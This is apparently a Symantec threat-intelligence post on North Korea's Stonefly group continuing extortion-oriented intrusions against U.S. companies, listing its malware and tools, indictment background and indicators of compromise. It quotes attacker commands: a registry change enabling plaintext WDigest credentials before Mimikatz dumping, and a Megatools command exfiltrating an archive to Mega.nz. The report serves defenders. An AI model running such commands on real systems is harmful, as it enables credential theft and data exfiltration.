Posted: 5 Min ReadThreat Intelligence

Stonefly: Extortion Attacks Continue Against U.S. Targets

Attacks continue after indictment naming North Korean suspect.

Symantec’s Threat Hunter Team has found evidence that the North Korean Stonefly group (aka Andariel, APT45, Silent Chollima, Onyx Sleet) is continuing to mount financially motivated attacks against organizations in the U.S., despite being the subject of an indictment and a multi-million dollar reward.

Symantec, part of Broadcom, found evidence of intrusions against three different organizations in the U.S. in August of this year, a month after the indictment was published. While the attackers didn’t succeed in deploying ransomware on the networks of any of the organizations affected, it is likely that the attacks were financially motivated. All the victims were private companies and involved in businesses with no obvious intelligence value. 

Attribution

In several of the attacks, Stonefly’s custom malware Backdoor.Preft (aka Dtrack, Valefor) was deployed. This tool is exclusively associated with the group. In addition to this, several Stonefly indicators of compromise recently documented by Microsoft were found on the compromised networks. The attackers used a fake Tableau certificate documented by Microsoft in addition to two other certificates (see Indicators of Compromise) that appear to be unique to this campaign. 

Toolset

Preft: Multi-stage backdoor capable of downloading and uploading files, executing commands, and downloading additional plugins. Preft can support multiple plugin types, including executable files, VBS, BAT, and shellcode. It has multiple persistence modes, including Startup_LNK, Service, Registry, and Task Scheduler. 

Nukebot: Backdoor capable of executing commands, downloading and uploading files, and taking screenshots. Nukebot has not been associated with Stonefly before; however, its source code was leaked and this is likely how Stonefly obtained the tool.

Batch files: The attackers used a malicious batch file to enable plaintext credentials, modifying the registry to add:

HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1

Mimikatz (see below) was then executed to dump credentials.

MimikatzPublicly available credential dumping tool. The attackers used a custom variant of the tool that writes harvested credentials to the file C:\Windows\Temp\KB0722.log. A similar custom variant of Mimikatz found on VirusTotal was linked by Mandiant to Stonefly.

Keyloggers: The attackers deployed two distinct keyloggers in their attacks: 

  • The first (SHA256: 485465f38582377f9496a6c77262670a313d8c6e01fd29a5dbd919b9a40e68d5) was a keylogger capable of stealing data from the clipboard. In addition to this, it logs when a program starts and captures which program’s keystrokes are input. Data captured is logged in a file named 0.log, which is archived into a ZIP archive named as a TMP file in the temporary directory with the password Pass@w0rd#384.
  • The second (SHA256: d867aaa627389c377a29f01493e9dff517f30db8441bf2ccc8f80c48eaa0bf91) was a keylogger capable of stealing data from the clipboard. It logs stolen data into a randomly named DAT file in the temporary directory. 

SliverOpen-source cross-platform penetration testing framework.

ChiselOpen-source proxy tool. It creates a TCP/UDP tunnel that is transported over HTTP and secured via SSH.

PuTTYPublicly available SSH client.

Plink: A command-line connection tool for PuTTY

Megatools: command line client for the Mega.nz cloud storage service. Megatools was used to perform data exfiltration:

CSIDL_WINDOWS\temp\mt.exe put -u [REMOVED] -p [REMOVED] CSIDL_WINDOWS\temp\sig.rar /Root 

Snap2HTML: Publicly available tool that takes snapshots of folder structures on a hard drive and saves them as HTML files.

FastReverseProxy (FRP): Open-sourced tool to expose local servers to the public internet.

Background

On July 25, 2024, the U.S. Justice Department indicted a North Korean man named Rim Jong Hyok on charges related to the attack campaign. Rim is alleged to be a member of the Stonefly group, which is linked to the North Korean military intelligence agency, the Reconnaissance General Bureau (RGB). 

He was charged with being involved in extorting U.S. hospitals and other healthcare providers between 2021 and 2023, laundering the ransom proceeds, and then using these proceeds to fund additional cyberattacks against targets in the defense, technology, and government sectors worldwide. Targets of these follow-on attacks included two U.S. Air Force bases, NASA-OIG, and organizations located in Taiwan, South Korea, and China. In addition to the indictment, the U.S. Department of State offered a reward of up to $10 million for information on his location or identification.

Stonefly

Stonefly first came to notice in July 2009, when it mounted distributed denial-of-service (DDoS) attacks against a number of South Korean, U.S. government, and financial websites.

It reappeared again in 2011, when it launched more DDoS attacks, but also revealed an espionage element to its attacks when it was found to be using a sophisticated backdoor Trojan (Backdoor.Prioxer) against selected targets.

In March 2013, the group was linked to the Jokra (Tojan.Jokra) disk-wiping attacks against a number of South Korean banks and broadcasters. Three months later, the group was involved in a string of DDoS attacks against South Korean government websites.

In recent years, the group’s capabilities have grown markedly and, since at least 2019, Symantec has seen its focus shift mainly to espionage operations against select, high-value targets. It appears to specialize in targeting organizations that hold classified or highly sensitive information or intellectual property. While other North Korean groups are well known for mounting financial attacks driven by the need to raise foreign currency for the regime, Stonefly had until recent years appeared not to be involved in financially motivated attacks. 

Undeterred

While Stonefly’s move into financially motivated attacks is a relatively recent development, the spotlight shone on the group’s activities due to the indictment naming one of its members has not yet led to a cessation of activity. The group is likely continuing to attempt to mount extortion attacks against organizations in the U.S.

Protection/Mitigation

For the latest protection updates, please visit the Symantec Protection Bulletin.

IOCDescription
f64dab23c50e3d131abcc1bdbb35ce9d68a34920dd77677730568c24a84411c5 Backdoor.Preft
a65cefb3c2ccdb50704b1af1008a1f8c7266aa85bd24aaf21f6eb1ddd5b79c81 Backdoor.Preft
12bf9fe2a68acb56eb01ca97388a1269b391f07831fd37a1371852ed5df44444 Backdoor.Preft
f0bc0f94ac743185e6d0c865a9e162f4ce2f306df13b2ea80df984160eb3363c Backdoor.Preft
243ad5458706e5c836f8eb88a9f67e136f1fa76ed44868217dc995a8c7d07bf7 Backdoor.Preft
96118268f9ab475860c3ae3edf00d9ee944d6440fd60a1673f770d150bfb16d3 Backdoor.Preft
2b254ae6690c9e37fa7d249e8578ee27393e47db1913816b4982867584be713a Backdoor.Preft
28149b1e55551948a629dcd2dacad32f6a197ed9324dc08b27ff00fa0bf0d909 Chisel
485465f38582377f9496a6c77262670a313d8c6e01fd29a5dbd919b9a40e68d5 Keylogger
d867aaa627389c377a29f01493e9dff517f30db8441bf2ccc8f80c48eaa0bf91 Keylogger
d71f478b1d5b8e489f5daafda99ad203de356095278c216a421694517826b79a Keylogger
a7711b8314b256d279e104ea3809f0668d3615fba584ca887d9c495795d0a98e Malicious file
42d52a78058954fcb85f538c86253214bacf475b4abecf3b426dad9d5b6543d6 Malicious file
5633691b680b46b8bd791a656b0bb9fe94e6354f389ab7bc6b96d007c9d41ffa Malicious file
ee7926b30c734b49f373b88b3f0d73a761b832585ac235eda68cf9435c931269 Malicious file
4ef8f3be7615392e4fe5751c9647ede1c6be2d2723af9b0fab69b6e58543e6ca Megatools
37b1c57120760acefb6ad9a99eb1a7dfa49d4ee6c4e6afcc09b385c24c5f0639 Mimikatz
511a75b2daca294db39d0e82e7af6161e67aab557b6b86bfea39ccbd2d7b40ae Nukebot
94eef46095c231b1ee33cd63e063d8a2fc663e44832e45a294cf8d8cf9df31f8 Nukebot
7bec0b28eb52f7a2e218367c0fef91e83c9df8f0463d55f3a064a2d6ca77c8d0 Plink
3f880395c9d5820c4018daecf56711ce4ee719736590792f652ea29cbcbdb8f3 Plink
ee017325a743516155210f367272ac736bbfc8284b9613180744f26dda6502b0 Plink
89aa7b67e9476d0f91df71a2b92ebe21f63f218afb6446296403f34f91831d15 PuTTY
cdd079bcb01e0f1229194f1f0ff9b6261e24ee16f8f75ec83763a33561c2071a Sliver
6de5219d913ed93389ae8e9e295695da1adc889c0352a9069f9921a0a2cb5ec6 Sliver
58d267dd80298c6d582ea7e45cf85a6e665d172d4122cc029cbcd427a33c2472 Sliver
e5d56cb7085ed8caf6c8269f4110265f9fb9cc7d8a91c498f3e2818fc978eee2 Sliver
1e2fad6c77410965ea2b3a5d36e8d980d839cc7a2b6f2e2d795d915e496ff398 Suspicious file
f128fabe601026ceb6d918d58061e3dd2f549366d14dcf6d44df4992bca3b53 Suspicious file
7ab3f076e70350f06ad19863fdd9e794648020f621c0b1bd20ad4d80f0745142 Suspicious file
e11e57d6d0944c2856828a287a868af96b47be32d4fe411f58dae4f0fe45ee2d Suspicious file
f3f17480a3e5c86d1ed876243a06db9b4d7d6aea91e284fa555882e0f1360206 Suspicious file
88b3c100d4a3168b1807fe9d1c4cb9d772e294c1cdf29ff287bc451d37891d8c Suspicious file
3b1fa5ffbdc79a395df274d558eed7cfebb3863d2cf4607c816a6e7d26007899 Suspicious file
ea2867c5de97e512b9780b6e73c075291259f5b24e95569ccbb05ed249d511a3 Suspicious file
35bbea3e077e63616e6785b667ddc67c3360be80b690fd0eea4e531b38777b0c Suspicious file
2c70973b2b70e60f4187cb704bbc3c74da25a526828384b841b53778fb53fd38 Suspicious file
ac6f6c77e0c9082f85324dcde9aabbdd1c4dcd51b78e45d1d8ace4d1648213dd Suspicious file
966319464e10b5a1ccc214a76a57ecf8afb322055f55154cf6e039c7373fd5e7 Suspicious file
5df907d0ff950194758a8ef32dabe78c31c7470c6e771c4f82e4c135a898f8fb Suspicious file
003815b3b170437316614c66e63fc0750e459f47cb0caf2af9cf584fffee4916 Suspicious file
93b75bc724a4a85b93fb749b734381ef79ab54c2debf27907794c8fd632fa0f5 Suspicious file
09795d17d027c561e8e48f6089a8cf37e71c5985afbf7f51945fc359b4697a16 Suspicious file
c5a6a18ec53a8743853112f58dd1fcc73d0b2fc6e9cb73b2424e29d78b4504df Suspicious file
fce7db964bef4b37f2f430c6ea99f439e5be06e047f6386222826df133b3a047 Snap2Html
75448c81d54acb16dd8f5c14e3d4713b3228858e07e437875fbea9b13f431437 Fast Reverse Proxy
216.120.201[.]112:443 Command-and-control server
51.81.168[.]157:443 Command-and-control server
217.195.153[.]209 IP address used by Plink
172.96.137[.]224 IP address used by Plink
144.208.127[.]115 IP address used by Plink

Certificate 1

thumbprint = "313cffaac3d1576ca3c1cee8f9a68a15a24ff418"
issuer = "/CN=Baramundi Inc."
subject = "/CN=Baramundi Inc."
version = 3
algorithm = "sha1WithRSA"
algorithm_oid = "1.3.14.3.2.29"
serial = "af:6d:f9:f9:69:86:58:80:49:1e:2b:ae:20:9f:0d:12"
not_before = 1683852503
not_after = 2208988799
verified = 1
digest_alg = "sha1"
digest = "efe03d9be2cd148594e5fcb7272a40b85e33d2bf"
file_digest = "efe03d9be2cd148594e5fcb7272a40b85e33d2bf"
number_of_certificates = 1

Certificate 2

thumbprint = "10b8b939400a59d2cb79fff735796d484394f8dd"
issuer = "/CN=VEXIS SOFTWARE LTD."
subject = "/CN=VEXIS SOFTWARE LTD."
version = 3
algorithm = "sha1WithRSA"
algorithm_oid = "1.3.14.3.2.29"
serial = "bc:bf:05:4e:a8:b2:69:be:4c:c9:04:f0:8d:f9:eb:97"
not_before = 1710348691
not_after = 2208988799
verified = 1
digest_alg = "sha1"
digest = "b9b5d20438cf54acf33ee5731dc283554b8a044c"
file_digest = "b9b5d20438cf54acf33ee5731dc283554b8a044c"
number_of_certificates = 1

About the Author

Threat Hunter Team

Symantec

The Threat Hunter Team is a group of security experts within Symantec whose mission is to investigate targeted attacks, drive enhanced protection in Symantec products, and offer analysis that helps customers respond to attacks.

Want to comment on this post?

We encourage you to share your thoughts on your favorite social platform.